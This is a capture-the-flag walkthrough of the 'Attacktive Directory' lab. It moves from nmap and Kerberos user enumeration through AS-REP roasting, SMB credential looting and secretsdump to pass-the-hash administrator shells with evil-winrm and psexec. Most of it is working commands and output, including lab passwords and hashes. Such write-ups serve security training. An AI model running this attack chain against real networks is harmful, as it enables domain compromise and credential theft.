Attacktive Directory

Enumeration
Nmap
└──╼ [??]$ sudo nmap -sC -sV -oN nmap.out 10.10.75.70
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-09 09:16 +0630
Nmap scan report for 10.10.75.70
Host is up (0.82s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-11-09 02:49:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-11-08T02:48:07
|_Not valid after: 2022-05-10T02:48:07
|_ssl-date: 2021-11-09T02:50:08+00:00; +1m40s from scanner time.
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1m39s, deviation: 0s, median: 1m38s
| smb2-time:
| date: 2021-11-09T02:49:56
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.82 second
As nmap output add spookysec.local
to /etc/hosts
echo $ip spookysec.local | sudo tee -a /etc/hosts
We can use enum4linux
to enumerate SMB for Users, Shares, etc..., but this is along output and I didn't add in this section cause of there is not much interesting information.
Kerberos Enumeration
We can bruteforce the domain controller with usernames and password list that are already given for this room and download it. To enumerate this, we can use this tool.
./kerbrute_linux_amd64 userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege "Does not require Pre-Authentication" set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
Impacket provides a tool called GetNPUsers.py
which searches the domain, lets attack the admin, svc-admin ,
┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:70c17da210a04ee11128df4a37c8182b$3cd76ee5ee8a5b1aea8fd85c27ce721b625ae4e8af0781110738fe2a945e09e08ddd30e8ca824c15cccbe7ed2a4b5e894fb921a8b2418c788e23bd97cdcd0c4cc86aacbdac3a8869c0c194fb1d70bebe81bd3d970bb590cd4b10dc693571398d7b22645e38b6b1e5000e90ecd2971008db0de575d1c808e3450a4aec2a3ca31d355b6a2ce1538c5d7209debac10c118f244410b7a831dd00ccc808996d0a681699f389203a30d6cae39c58429bb174a1d8819145e11cc25a22cadd36ad6900b7299396d6c4368803bb15a26974453a38b51730825b53f4f263eeb2f1c5008a97c15d73f45c044482eeb761b10c281a1f4e4c

Privilege Escalation
Now we have credentials for smb server , svc-admin:management2005
,
┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ smbmap -H spookysec.local -d spookysec.local -u svc-admin -p management2005
[+] Finding open SMB ports....
[+] User SMB session established on spookysec.local...
[+] IP: spookysec.local:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
.
dr--r--r-- 0 Sat Apr 4 19:08:39 2020 .
dr--r--r-- 0 Sat Apr 4 19:08:39 2020 ..
fr--r--r-- 48 Sat Apr 4 19:08:53 2020 backup_credentials.txt
backup READ ONLY
C$ NO ACCESS Default share
There is one interesting file which is called backup_credentials.txt
in backup folder, Let's login and download it.
┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ smbclient \\\\10.10.75.70\\backup -U svc-admin
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 5 01:38:39 2020
.. D 0 Sun Apr 5 01:38:39 2020
backup_credentials.txt A 48 Sun Apr 5 01:38:53 2020
8247551 blocks of size 4096. 3571598 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>
┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$
backup@spookysec.local:backup2517860
Now we have another account, let's use impacket tool which is call secretsdump.py
to view all the password hashes this user can access.

We get administrator password hashes, you can crack this hash but we can use Pass The Hash
method with evil-winrm
and psexec.py
tools.
Evil-Winrm
┌─[sheinn101@parrot]─[~/thm/attacktive-directory]
└──╼ [??]$ evil-winrm -i 10.10.75.70 -u administrator -H 0e0363213e37b94221497260b0bcb4fc
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
thm-ad\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Psexec.py
python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:@spookysec.local -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on spookysec.local.....
[*] Found writable share ADMIN$
[*] Uploading file hFPZJEou.exe
[*] Opening SVCManager on spookysec.local.....
[*] Creating service ekJz on spookysec.local.....
[*] Starting service ekJz.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1490]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Now we get Administrator
access.

Last updated